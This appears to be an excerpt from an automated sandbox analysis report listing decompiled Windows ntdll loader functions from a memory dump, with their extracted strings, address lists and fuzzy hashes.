Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: (^$*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$`3^ API String ID: 0-998226430 Opcode ID: 636dc3ef743ae91ebec792623df1b090fab92b3c3be5f414cc2170fd6d969282 Instruction ID: 1bd7925e9e67df613e5db5a0303cb181b294c9eda2c01934b9ac140638577c3a Opcode Fuzzy Hash: 636dc3ef743ae91ebec792623df1b090fab92b3c3be5f414cc2170fd6d969282 Instruction Fuzzy Hash: 06A13671B0061B8FEB29DB6AC454BBEB7E5AF44710F14457DDA86CB680EB30D841CB90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%

E010C8794(void* __ecx) { signed int _v0; char _v8; signed int _v12; void* _v16; signed int _v20; intOrPtr _v24; signed int _v28; signed int _v32; signed int _v40; void* __ebx; void* __edi; void* __esi; void* __ebp; intOrPtr* _t77; signed int _t80; signed char _t81; signed int _t87; signed int _t91; void* _t92; void* _t94; signed int _t95; signed int _t103; signed int _t105; signed int _t110; signed int _t118; intOrPtr* _t121; intOrPtr _t122; signed int _t125; signed int _t129; signed int _t131; signed int _t134; signed int _t136; signed int _t143; signed int* _t147; signed int _t151; void* _t153; signed int* _t157; signed int _t159; signed int _t161; signed int _t166; signed int _t168; _push(__ecx); _t153 = __ecx; _t159 = 0; _t121 = __ecx + 0x3c; if( *_t121 == 0) { L2: _t77 = *((intOrPtr*)(_t153 + 0x58)); if(_t77 == 0 || *_t77 == *((intOrPtr*)(_t153 + 0x54))) { _t122 = *((intOrPtr*)(_t153 + 0x20)); _t180 = *((intOrPtr*)(_t122 + 0x3a)); if( *((intOrPtr*)(_t122 + 0x3a)) != 0) { L6: if(E010C934A() != 0) { _t159 = E0113A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0); __eflags = _t159; if(_t159 < 0) { _t81 = *0x11a5780; // 0x0 __eflags = _t81 & 0x00000003; if((_t81 & 0x00000003) != 0) { _push(_t159); E01135510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n", *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18))); _t81 = *0x11a5780; // 0x0 } __eflags = _t81 & 0x00000010; if((_t81 & 0x00000010) != 0) { asm("int3"); } } } } else { _t159 = E010C849B(0, _t122, _t153, _t159, _t180); if(_t159 >= 0) { goto L6; } } _t80 = _t159; goto L8; } else { _t125 = 0x13; asm("int 0x29"); _push(0); _push(_t159); _t161 = _t125; _t87 = *( *[fs:0x30] + 0x1e8); _t143 = 0; _v40 = _t161; _t118 = 0; _push(_t153); __eflags = _t87; if(_t87 != 0) { _t118 = _t87 + 0x5d8; __eflags = _t118; if(_t118 == 0) { L46: _t118 = 0; } else { __eflags = *(_t118 + 0x30); if( *(_t118 + 0x30) == 0) { goto L46; } } } _v32 = 0; _v28 = 0; _v16 = 0; _v20 = 0; _v12 = 0; __eflags = _t118; if(_t118 != 0) { __eflags = _t161; if(_t161 != 0) { __eflags = *(_t118 + 8); if( *(_t118 + 8) == 0) { L22: _t143 = 1; __eflags = 1; } else { _t19 = _t118 + 0x40; // 0x40 _t156 = _t19; E010C8999(_t19, &_v16); __eflags = _v0; if(_v0 != 0) { __eflags = _v0 - 1; if(_v0 != 1) { goto L22; } else { _t128 = *(_t161 + 0x64); __eflags = *(_t161 + 0x64); if( *(_t161 + 0x64) == 0) { goto L22; } else { E010C8999(_t128, &_v12); _t147 = _v12; _t91 = 0; __eflags = 0; _t129 = *_t147; while(1) { __eflags = *((intOrPtr*)(0x11a5c60 + _t91 * 8)) - _t129; if( *((intOrPtr*)(0x11a5c60 + _t91 * 8)) == _t129) { break; } _t91 = _t91 + 1; __eflags = _t91 - 5; if(_t91 < 5) { continue; } else { _t131 = 0; __eflags = 0; } L37: __eflags = _t131; if(_t131 != 0) { goto L22; } else { __eflags = _v16 - _t147; if(_v16 != _t147) { goto L22; } else { E010D2280(_t92, 0x11a86cc); _t94 = E01189DFB( &_v20); __eflags = _t94 - 1; if(_t94 != 1) { } asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); *_t118 = *_t118 + 1; asm("adc dword [ebx+0x4], 0x0"); _t95 = E010E61A0( &_v32); __eflags = _t95; if(_t95 != 0) { __eflags = _v32 | _v28; if((_v32 | _v28) != 0) { _t71 = _t118 + 0x40; // 0x3f _t134 = _t71; goto L55; } } goto L30; } } goto L56; } _t92 = 0x11a5c64 + _t91 * 8; asm("lock xadd [eax], ecx"); _t131 = (_t129 | 0xffffffff) - 1; goto L37; } } goto L56; } else { _t143 = E010C8A0A( *((intOrPtr*)(_t161 + 0x18)), &_v12); __eflags = _t143; if(_t143 != 0) { _t157 = _v12; _t103 = 0; __eflags = 0; _t136 = &(_t157[1]); *(_t161 + 0x64) = _t136; _t151 = *_t157; _v20 = _t136; while(1) { __eflags = *((intOrPtr*)(0x11a5c60 + _t103 * 8)) - _t151; if( *((intOrPtr*)(0x11a5c60 + _t103 * 8)) == _t151) { break; } _t103 = _t103 + 1; __eflags = _t103 - 5; if(_t103 < 5) { continue; } L21: _t105 = E010FF380(_t136, 0x1091184, 0x10); __eflags = _t105; if(_t105 != 0) { __eflags = *_t157 - *_v16; if( *_t157 >= *_v16) { goto L22; } else { asm("cdq"); _t166 = _t157[5] & 0x0000ffff; _t108 = _t157[5] & 0x0000ffff; asm("cdq"); _t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff; __eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) - *((intOrPtr*)(_t118 + 0x2c)); if(__eflags > 0) { L29: E010D2280(_t108, 0x11a86cc); *_t118 = *_t118 + 1; _t42 = _t118 + 0x40; // 0x3f _t156 = _t42; asm("adc dword [ebx+0x4], 0x0"); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t110 = E010E61A0( &_v32); __eflags = _t110; if(_t110 != 0) { __eflags = _v32 | _v28; if((_v32 | _v28) != 0) { _t134 = _v20; L55: E01189D2E(_t134, 1, _v32, _v28, *(_v24 + 0x24) & 0x0000ffff, *((intOrPtr*)(_v24 + 0x28))); } } L30: *_t118 = *_t118 + 1; asm("adc dword [ebx+0x4], 0x0"); E010CFFB0(_t118, _t156, 0x11a86cc); goto L22; } else { if(__eflags < 0) { goto L22; } else { __eflags = _t168 - *((intOrPtr*)(_t118 + 0x28)); if(_t168 < *((intOrPtr*)(_t118 + 0x28))) { goto L22; } else { goto L29; } } } } goto L56; } goto L22; } asm("lock inc dword [eax]"); goto L21; } } } } } return _t143; } } else { _push( &_v8); _push( *((intOrPtr*)(__ecx + 0x50))); _push(__ecx + 0x40); _push(_t121); _push(0xffffffff); _t80 = E010F9A00(); _t159 = _t80; if(_t159 < 0) { L8: return _t80; } else { goto L2; } } L56: } 0x010c8799 0x010c879d 0x010c87a1 0x010c87a3 0x010c87a8 0x010c87c3 0x010c87c3 0x010c87c8 0x010c87d1 0x010c87d4 0x010c87d8 0x010c87e5 0x010c87ec 0x01119bfe 0x01119c00 0x01119c02 0x01119c08 0x01119c0d 0x01119c0f 0x01119c14 0x01119c2d 0x01119c32 0x01119c37 0x01119c3a 0x01119c3c 0x01119c42 0x01119c42 0x01119c3c 0x01119c02 0x010c87da 0x010c87df 0x010c87e3 0x00000000 0x00000000 0x010c87e3 0x010c87f2 0x00000000 0x010c87fb 0x010c87fd 0x010c87fe 0x010c880e 0x010c880f 0x010c8810 0x010c8814 0x010c881a 0x010c881c 0x010c881f 0x010c8821 0x010c8822 0x010c8824 0x010c8826 0x010c882c 0x010c882e 0x01119c48 0x01119c48 0x010c8834 0x010c8834 0x010c8837 0x00000000 0x00000000 0x010c8837 0x010c882e 0x010c883d 0x010c8840 0x010c8843 0x010c8846 0x010c8849 0x010c884c 0x010c884e 0x010c8850 0x010c8852 0x010c8854 0x010c8857 0x010c88b4 0x010c88b6 0x010c88b6 0x010c8859 0x010c8859 0x010c8859 0x010c8861 0x010c8866 0x010c886a 0x010c893d 0x010c8941 0x00000000 0x010c8947 0x010c8947 0x010c894a 0x010c894c 0x00000000 0x010c8952 0x010c8955 0x010c895a 0x010c895d 0x010c895d 0x010c895f 0x010c8961 0x010c8961 0x010c8968 0x00000000 0x00000000 0x010c896a 0x010c896b 0x010c896e 0x00000000 0x010c8970 0x010c8970 0x010c8970 0x010c8970 0x010c8972 0x010c8972 0x010c8974 0x00000000 0x010c897a 0x010c897a 0x010c897d 0x00000000 0x010c8983 0x01119c65 0x01119c6d 0x01119c72 0x01119c75 0x01119c75 0x01119c82 0x01119c86 0x01119c87 0x01119c88 0x01119c89 0x01119c8c 0x01119c90 0x01119c95 0x01119c97 0x01119ca0 0x01119ca3 0x01119ca9 0x01119ca9 0x00000000 0x01119ca9 0x01119ca3 0x00000000 0x01119c97 0x010c897d 0x00000000 0x010c8974 0x010c8988 0x010c8992 0x010c8996 0x00000000 0x010c8996 0x010c894c 0x00000000 0x010c8870 0x010c887b 0x010c887d 0x010c887f 0x010c8881 0x010c8884 0x010c8884 0x010c8886 0x010c8889 0x010c888c 0x010c888e 0x010c8891 0x010c8891 0x010c8898 0x00000000 0x00000000 0x010c889a 0x010c889b 0x010c889e 0x00000000 0x00000000 0x010c88a0 0x010c88a8 0x010c88b0 0x010c88b2 0x010c88d3 0x010c88d5 0x00000000 0x010c88d7 0x010c88db 0x010c88dc 0x010c88e0 0x010c88e8 0x010c88ee 0x010c88f0 0x010c88f3 0x010c88fc 0x010c8901 0x010c8906 0x010c890c 0x010c890c 0x010c890f 0x010c8916 0x010c8917 0x010c8918 0x010c8919 0x010c891a 0x010c891f 0x010c8921 0x01119c52 0x01119c55 0x01119c5b 0x01119cac 0x01119cc0 0x01119cc0 0x01119c55 0x010c8927 0x010c8927 0x010c892f 0x010c8933 0x00000000 0x010c88f5 0x010c88f5 0x00000000 0x010c88f7 0x010c88f7 0x010c88fa 0x00000000 0x00000000 0x00000000 0x00000000 0x010c88fa 0x010c88f5 0x010c88f3 0x00000000 0x010c88d5 0x00000000 0x010c88b2 0x010c88c9 0x00000000 0x010c88c9 0x010c887f 0x010c886a 0x010c8857 0x010c8852 0x010c88bf 0x010c88bf 0x010c87aa 0x010c87ad 0x010c87ae 0x010c87b4 0x010c87b5 0x010c87b6 0x010c87b8 0x010c87bd 0x010c87c1 0x010c87f4 0x010c87fa 0x00000000 0x00000000 0x00000000 0x010c87c1 0x00000000

Strings

LdrpDoPostSnapWork , xrefs: 01119C1E LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x , xrefs: 01119C18 minkernel\ntdll\ldrsnap.c , xrefs: 01119C28

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c API String ID: 2994545307-1948996284 Opcode ID: d374909d52a43ed0e7d66cbe1004d445547f80d489ca85b6079b1f138bb02cc6 Instruction ID: 73874d2587d934a539b0a4a15e4d56a3774b6ad689fdb452dbfd0b5a82c87acf Opcode Fuzzy Hash: d374909d52a43ed0e7d66cbe1004d445547f80d489ca85b6079b1f138bb02cc6 Instruction Fuzzy Hash: 6B911631A0020AAFDF58DF59D880ABEBBF5FF40B14B4481AED985AB544E730E945CF94

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%

E010C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) { char _v8; intOrPtr _v12; intOrPtr _v16; intOrPtr _v20; char _v24; signed int _t73; void* _t77; char* _t82; char* _t87; signed char* _t97; signed char _t102; intOrPtr _t107; signed char* _t108; intOrPtr _t112; intOrPtr _t124; intOrPtr _t125; intOrPtr _t126; _t107 = __edx; _v12 = __ecx; _t125 = *((intOrPtr*)(__ecx + 0x20)); _t124 = 0; _v20 = __edx; if(E010CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe, &_v24, &_v8) >= 0) { _t112 = _v8; } else { _t112 = 0; _v8 = 0; } if(_t112 != 0) { if(( *(_v12 + 0x10) & 0x00800000) != 0) { _t124 = 0xc000007b; goto L8; } _t73 = *(_t125 + 0x34) | 0x00400000; *(_t125 + 0x34) = _t73; if(( *(_t112 + 0x10) & 0x00000001) == 0) { goto L3; } *(_t125 + 0x34) = _t73 | 0x01000000; _t124 = E010BC9A4( *((intOrPtr*)(_t125 + 0x18))); if(_t124 < 0) { goto L8; } else { goto L3; } } else { L3: if(( *(_t107 + 0x16) & 0x00002000) == 0) { *(_t125 + 0x34) = *(_t125 + 0x34) & 0xfffffffb; L8: return _t124; } if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) { if(( *(_t107 + 0x5e) & 0x00000080) != 0) { goto L5; } _t102 = *0x11a5780; // 0x0 if((_t102 & 0x00000003) != 0) { E01135510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24); _t102 = *0x11a5780; // 0x0 } if((_t102 & 0x00000010) != 0) { asm("int3"); } _t124 = 0xc0000428; goto L8; } L5: if(( *(_t125 + 0x34) & 0x01000000) != 0) { goto L8; } _t77 = _a4 - 0x40000003; if(_t77 == 0 || _t77 == 0x33) { _v16 = *((intOrPtr*)(_t125 + 0x18)); if(E010D7D50() != 0) { _t82 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } else { _t82 = 0x7ffe0384; } _t108 = 0x7ffe0385; if( *_t82 != 0) { if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) { if(E010D7D50() == 0) { _t97 = 0x7ffe0385; } else { _t97 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; } if(( *_t97 & 0x00000020) != 0) { E01137016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0); } } } if(_a4 != 0x40000003) { L14: _t126 = *((intOrPtr*)(_t125 + 0x18)); if(E010D7D50() != 0) { _t87 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } else { _t87 = 0x7ffe0384; } if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) { if(E010D7D50() != 0) { _t108 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; } if(( *_t108 & 0x00000020) != 0) { E01137016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0); } } goto L8; } else { _v16 = _t125 + 0x24; _t124 = E010EA1C3( *((intOrPtr*)(_t125 + 0x18)), *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24); if(_t124 < 0) { E010BB1E1(_t124, 0x1490, 0, _v16); goto L8; } goto L14; } } else { goto L8; } } } 0x010c7e4c 0x010c7e50 0x010c7e55 0x010c7e58 0x010c7e5d 0x010c7e71 0x010c7f33 0x010c7e77 0x010c7e77 0x010c7e79 0x010c7e79 0x010c7e7e 0x010c7f45 0x01119848 0x00000000 0x01119848 0x010c7f4e 0x010c7f53 0x010c7f5a 0x00000000 0x00000000 0x0111985a 0x01119862 0x01119866 0x00000000 0x0111986c 0x00000000 0x0111986c 0x010c7e84 0x010c7e84 0x010c7e8d 0x01119871 0x010c7eb8 0x010c7ec0 0x010c7ec0 0x010c7e9a 0x0111987e 0x00000000 0x00000000 0x01119884 0x0111988b 0x011198a7 0x011198ac 0x011198b1 0x011198b6 0x011198b8 0x011198b8 0x011198b9 0x00000000 0x011198b9 0x010c7ea0 0x010c7ea7 0x00000000 0x00000000 0x010c7eac 0x010c7eb1 0x010c7ec6 0x010c7ed0 0x011198cc 0x010c7ed6 0x010c7ed6 0x010c7ed6 0x010c7ede 0x010c7ee3 0x011198e3 0x011198f0 0x01119902 0x011198f2 0x011198fb 0x011198fb 0x01119907 0x0111991d 0x0111991d 0x01119907 0x011198e3 0x010c7ef0 0x010c7f14 0x010c7f14 0x010c7f1e 0x01119946 0x010c7f24 0x010c7f24 0x010c7f24 0x010c7f2c 0x0111996a 0x01119975 0x01119975 0x0111997e 0x01119993 0x01119993 0x0111997e 0x00000000 0x010c7ef2 0x010c7efc 0x010c7f0a 0x010c7f0e 0x01119933 0x00000000 0x01119933 0x00000000 0x010c7f0e 0x00000000 0x00000000 0x00000000 0x010c7eb1

Strings

LdrpCompleteMapModule , xrefs: 01119898 Could not validate the crypto signature for DLL %wZ , xrefs: 01119891 minkernel\ntdll\ldrmap.c , xrefs: 011198A2

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c API String ID: 0-1676968949 Opcode ID: 721c8390d25e9e5d989e76f6e285850c86418e156e79750525ef2d57028aeee5 Instruction ID: 78cfbce50914f63f5a4e4152af38e43a7d5ba3f0d6966685b5710864c7ba80ac Opcode Fuzzy Hash: 721c8390d25e9e5d989e76f6e285850c86418e156e79750525ef2d57028aeee5 Instruction Fuzzy Hash: B451243260074ADBEB2ACB5DC954B6EBBE4AB05B18F0405ADE9A19B3D5D730ED00CF51

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E010BE620(void* __ecx, short* __edx, short* _a4) { char _v16; char _v20; intOrPtr _v24; char* _v28; char _v32; char _v36; char _v44; signed int _v48; intOrPtr _v52; void* _v56; void* _v60; char _v64; void* _v68; void* _v76; void* _v84; signed int _t59; signed int _t74; signed short* _t75; signed int _t76; signed short* _t78; signed int _t83; short* _t93; signed short* _t94; short* _t96; void* _t97; signed int _t99; void* _t101; void* _t102; _t80 = __ecx; _t101 = (_t99 & 0xfffffff8) - 0x34; _t96 = __edx; _v44 = __edx; _t78 = 0; _v56 = 0; if(__ecx == 0 || __edx == 0) { L28: _t97 = 0xc000000d; } else { _t93 = _a4; if(_t93 == 0) { goto L28; } _t78 = E010BF358(__ecx, 0xac); if(_t78 == 0) { _t97 = 0xc0000017; L6: if(_v56 != 0) { _push(_v56); E010F95D0(); } if(_t78 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78); } return _t97; } E010FFA60(_t78, 0, 0x158); _v48 = _v48 & 0x00000000; _t102 = _t101 + 0xc; *_t96 = 0; *_t93 = 0; E010FBB40(_t80, &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language"); _v36 = 0x18; _v28 = &_v44; _v64 = 0; _push( &_v36); _push(0x20019); _v32 = 0; _push( &_v64); _v24 = 0x40; _v20 = 0; _v16 = 0; _t97 = E010F9600(); if(_t97 < 0) { goto L6; } E010FBB40(0, &_v36, L"InstallLanguageFallback"); _push(0); _v48 = 4; _t97 = L010BF018(_v64, &_v44, &_v56, _t78, &_v48); if(_t97 >= 0) { if(_v52 != 1) { L17: _t97 = 0xc0000001; goto L6; } _t59 = *_t78 & 0x0000ffff; _t94 = _t78; _t83 = _t59; if(_t59 == 0) { L19: if(_t83 == 0) { L23: E010FBB40(_t83, _t102 + 0x24, _t78); if(L010C43C0( &_v48, &_v64) == 0) { goto L17; } _t84 = _v48; *_v48 = _v56; if( *_t94 != 0) { E010FBB40(_t84, _t102 + 0x24, _t94); if(L010C43C0( &_v48, &_v64) != 0) { *_a4 = _v56; } else { _t97 = 0xc0000001; *_v48 = 0; } } goto L6; } _t83 = _t83 & 0x0000ffff; while(_t83 == 0x20) { _t94 = &(_t94[1]); _t74 = *_t94 & 0x0000ffff; _t83 = _t74; if(_t74 != 0) { continue; } goto L23; } goto L23; } else { goto L14; } while(1) { L14: _t27 = &(_t94[1]); // 0x2 _t75 = _t27; if(_t83 == 0x2c) { break; } _t94 = _t75; _t76 = *_t94 & 0x0000ffff; _t83 = _t76; if(_t76 != 0) { continue; } goto L23; } *_t94 = 0; _t94 = _t75; _t83 = *_t75 & 0x0000ffff; goto L19; } } } 0x010be620 0x010be628 0x010be62f 0x010be631 0x010be635 0x010be637 0x010be63e 0x01115503 0x01115503 0x010be64c 0x010be64c 0x010be651 0x00000000 0x00000000 0x010be661 0x010be665 0x0111542a 0x010be715 0x010be71a 0x010be71c 0x010be720 0x010be720 0x010be727 0x010be736 0x010be736 0x010be743 0x010be743 0x010be673 0x010be678 0x010be67d 0x010be682 0x010be685 0x010be692 0x010be69b 0x010be6a3 0x010be6ad 0x010be6b1 0x010be6b2 0x010be6bb 0x010be6bf 0x010be6c0 0x010be6c8 0x010be6cc 0x010be6d5 0x010be6d9 0x00000000 0x00000000 0x010be6e5 0x010be6ea 0x010be6f9 0x010be70b 0x010be70f 0x01115439 0x0111545e 0x0111545e 0x00000000 0x0111545e 0x0111543b 0x0111543e 0x01115440 0x01115445 0x01115472 0x01115475 0x0111548d 0x01115493 0x011154a9 0x00000000 0x00000000 0x011154ab 0x011154b4 0x011154bc 0x011154c8 0x011154de 0x011154fb 0x011154e0 0x011154e6 0x011154eb 0x011154eb 0x011154de 0x00000000 0x011154bc 0x01115477 0x0111547a 0x01115480 0x01115483 0x01115486 0x0111548b 0x00000000 0x00000000 0x00000000 0x0111548b 0x00000000 0x00000000 0x00000000 0x00000000 0x01115447 0x01115447 0x01115447 0x01115447 0x0111544e 0x00000000 0x00000000 0x01115450 0x01115452 0x01115455 0x0111545a 0x00000000 0x00000000 0x00000000 0x0111545c 0x0111546a 0x0111546d 0x0111546f 0x00000000 0x0111546f 0x010be70f

Strings

InstallLanguageFallback , xrefs: 010BE6DB \Registry\Machine\System\CurrentControlSet\Control\NLS\Language , xrefs: 010BE68C @ , xrefs: 010BE6C0

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language API String ID: 0-1757540487 Opcode ID: 6f2131fc5bc4c99dedde5461048acca8997c6c2f00900880be594d5e66bd7e9b Instruction ID: 5c433435fd827ebf4c44a846dda3a873a7e379341cec5ca1dd07d2f460d8b457 Opcode Fuzzy Hash: 6f2131fc5bc4c99dedde5461048acca8997c6c2f00900880be594d5e66bd7e9b Instruction Fuzzy Hash: 5051B1725083069BD754DF68C480AABB7E9BF89614F05092EFAC5E7640F734D904CBA2

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E011351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) { signed short* _t63; signed int _t64; signed int _t65; signed int _t67; intOrPtr _t74; intOrPtr _t84; intOrPtr _t88; intOrPtr _t94; void* _t100; void* _t103; intOrPtr _t105; signed int _t106; short* _t108; signed int _t110; signed int _t113; signed int* _t115; signed short* _t117; void* _t118; void* _t119; _push(0x80); _push(0x11905f0); E0110D0E8(__ebx, __edi, __esi); *((intOrPtr*)(_t118 - 0x80)) = __edx; _t115 = *(_t118 + 0xc); *(_t118 - 0x7c) = _t115; *((char*)(_t118 - 0x65)) = 0; *((intOrPtr*)(_t118 - 0x64)) = 0; _t113 = 0; *((intOrPtr*)(_t118 - 0x6c)) = 0; *((intOrPtr*)(_t118 - 4)) = 0; _t100 = __ecx; if(_t100 == 0) { *(_t118 - 0x90) = *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24; E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c))); *((char*)(_t118 - 0x65)) = 1; _t63 = *(_t118 - 0x90); _t101 = _t63[2]; _t64 = *_t63 & 0x0000ffff; _t113 = *((intOrPtr*)(_t118 - 0x6c)); L20: _t65 = _t64 >> 1; L21: _t108 = *((intOrPtr*)(_t118 - 0x80)); if(_t108 == 0) { L27: *_t115 = _t65 + 1; _t67 = 0xc0000023; L28: *((intOrPtr*)(_t118 - 0x64)) = _t67; L29: *((intOrPtr*)(_t118 - 4)) = 0xfffffffe; E011353CA(0); return E0110D130(0, _t113, _t115); } if(_t65 >= *((intOrPtr*)(_t118 + 8))) { if(_t108 != 0 && *((intOrPtr*)(_t118 + 8)) >= 1) { *_t108 = 0; } goto L27; } *_t115 = _t65; _t115 = _t65 + _t65; E010FF3E0(_t108, _t101, _t115); *((short*)(_t115 + *((intOrPtr*)(_t118 - 0x80)))) = 0; _t67 = 0; goto L28; } _t103 = _t100 - 1; if(_t103 == 0) { _t117 = *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38; _t74 = E010D3690(1, _t117, 0x1091810, _t118 - 0x74); *((intOrPtr*)(_t118 - 0x64)) = _t74; _t101 = _t117[2]; _t113 = *((intOrPtr*)(_t118 - 0x6c)); if(_t74 < 0) { _t64 = *_t117 & 0x0000ffff; _t115 = *(_t118 - 0x7c); goto L20; } _t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1; _t115 = *(_t118 - 0x7c); goto L21; } if(_t103 == 1) { _t105 = 4; *((intOrPtr*)(_t118 - 0x78)) = _t105; *((intOrPtr*)(_t118 - 0x70)) = 0; _push(_t118 - 0x70); _push(0); _push(0); _push(_t105); _push(_t118 - 0x78); _push(0x6b); *((intOrPtr*)(_t118 - 0x64)) = E010FAA90(); *((intOrPtr*)(_t118 - 0x64)) = 0; _t113 = L010D4620(_t105, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, *((intOrPtr*)(_t118 - 0x70))); *((intOrPtr*)(_t118 - 0x6c)) = _t113; if(_t113 != 0) { _push(_t118 - 0x70); _push( *((intOrPtr*)(_t118 - 0x70))); _push(_t113); _push(4); _push(_t118 - 0x78); _push(0x6b); _t84 = E010FAA90(); *((intOrPtr*)(_t118 - 0x64)) = _t84; if(_t84 < 0) { goto L29; } _t110 = 0; _t106 = 0; while(1) { *((intOrPtr*)(_t118 - 0x84)) = _t110; *(_t118 - 0x88) = _t106; if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) { break; } _t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff); _t106 = _t106 + 1; } _t88 = E0113500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110); _t119 = _t119 + 0x1c; *((intOrPtr*)(_t118 - 0x64)) = _t88; if(_t88 < 0) { goto L29; } _t101 = _t118 - 0x3c; _t65 = *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1; goto L21; } _t67 = 0xc0000017; goto L28; } _push(0); _push(0x20); _push(_t118 - 0x60); _push(0x5a); _t94 = E010F9860(); *((intOrPtr*)(_t118 - 0x64)) = _t94; if(_t94 < 0) { goto L29; } if( *((intOrPtr*)(_t118 - 0x50)) == 1) { _t101 = L"Legacy"; _push(6); } else { _t101 = L"UEFI"; _push(4); } _pop(_t65); goto L21; } 0x011351be 0x011351c3 0x011351c8 0x011351cd 0x011351d0 0x011351d3 0x011351d8 0x011351db 0x011351de 0x011351e0 0x011351e3 0x011351e6 0x011351e8 0x01135342 0x01135351 0x01135356 0x0113535a 0x01135360 0x01135363 0x01135366 0x01135369 0x01135369 0x0113536b 0x0113536b 0x01135370 0x011353a3 0x011353a4 0x011353a6 0x011353ab 0x011353ab 0x011353ae 0x011353ae 0x011353b5 0x011353bf 0x011353bf 0x01135375 0x01135396 0x011353a0 0x011353a0 0x00000000 0x01135396 0x01135377 0x01135379 0x0113537f 0x0113538c 0x01135390 0x00000000 0x01135390 0x011351ee 0x011351f1 0x01135301 0x01135310 0x01135315 0x01135318 0x0113531b 0x01135320 0x0113532e 0x01135331 0x00000000 0x01135331 0x01135328 0x01135329 0x00000000 0x01135329 0x011351fa 0x01135235 0x01135236 0x01135239 0x0113523f 0x01135240 0x01135241 0x01135242 0x01135246 0x01135247 0x0113524e 0x01135251 0x01135267 0x01135269 0x0113526e 0x0113527d 0x0113527e 0x01135281 0x01135282 0x01135287 0x01135288 0x0113528a 0x0113528f 0x01135294 0x00000000 0x00000000 0x0113529a 0x0113529c 0x0113529e 0x0113529e 0x011352a4 0x011352b0 0x00000000 0x00000000 0x011352ba 0x011352bc 0x011352bc 0x011352d4 0x011352d9 0x011352dc 0x011352e1 0x00000000 0x00000000 0x011352e7 0x011352f4 0x00000000 0x011352f4 0x01135270 0x00000000 0x01135270 0x011351fc 0x011351fd 0x01135202 0x01135203 0x01135205 0x0113520a 0x0113520f 0x00000000 0x00000000 0x0113521b 0x01135226 0x0113522b 0x0113521d 0x0113521d 0x01135222 0x01135222 0x0113522d 0x00000000

Strings

Legacy , xrefs: 01135226 UEFI , xrefs: 0113521D

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

